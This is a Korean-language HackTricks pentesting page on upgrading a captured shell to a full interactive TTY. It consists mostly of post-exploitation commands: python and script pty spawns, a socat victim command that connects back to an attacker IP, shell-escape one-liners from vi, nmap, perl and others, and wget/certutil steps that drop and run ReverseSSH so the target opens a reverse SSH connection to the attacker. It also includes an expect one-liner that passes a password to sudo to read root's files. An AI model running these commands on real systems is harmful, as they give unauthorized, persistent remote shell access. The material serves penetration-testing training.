Full TTYs

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

전체 TTY

SHELL 변수에 설정한 쉘은 반드시 _/etc/shells_에 목록으로 표시되어야 합니다. 또한, 다음 스니펫은 bash에서만 작동합니다. zsh에서는 bash를 실행하여 쉘을 변경하세요.

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

**stty -a**를 실행하여 **행(row)**과 **열(column)**의 **숫자(number)**를 얻을 수 있습니다.

스크립트

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

쉘 생성

  • python -c 'import pty; pty.spawn("/bin/sh")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

  • script -qc /bin/bash /dev/null

  • perl -e 'exec "/bin/sh";'

  • perl: exec "/bin/sh";

  • ruby: exec "/bin/sh"

  • lua: os.execute('/bin/sh')

  • IRB: exec "/bin/sh"

  • vi: :!bash

  • vi: :set shell=/bin/bash:shell

  • nmap: !sh

ReverseSSH

대상에게 정적 링크된 ssh 서버 ReverseSSH를 놓는 것은 대화식 쉘 액세스, 파일 전송포트 포워딩에 편리한 방법입니다.

아래는 x86에 대한 upx 압축된 이진 파일의 예입니다. 다른 이진 파일의 경우 릴리스 페이지를 확인하십시오.

  1. 로컬에서 ssh 포트 포워딩 요청을 받을 준비를 합니다:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444
  • (2a) Linux 대상:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2
  • 만약 ReverseSSH 포트 포워딩 요청이 성공했다면, 이제 reverse-ssh(.exe)를 실행하는 사용자의 컨텍스트에서 기본 비밀번호 letmeinbrudipls로 로그인할 수 있어야 합니다.

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

TTY 없음

어떤 이유로 인해 전체 TTY를 얻을 수 없더라도 사용자 입력을 기대하는 프로그램과 상호 작용할 수 있습니다. 다음 예제에서는 비밀번호가 파일을 읽기 위해 sudo에 전달됩니다:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

Last updated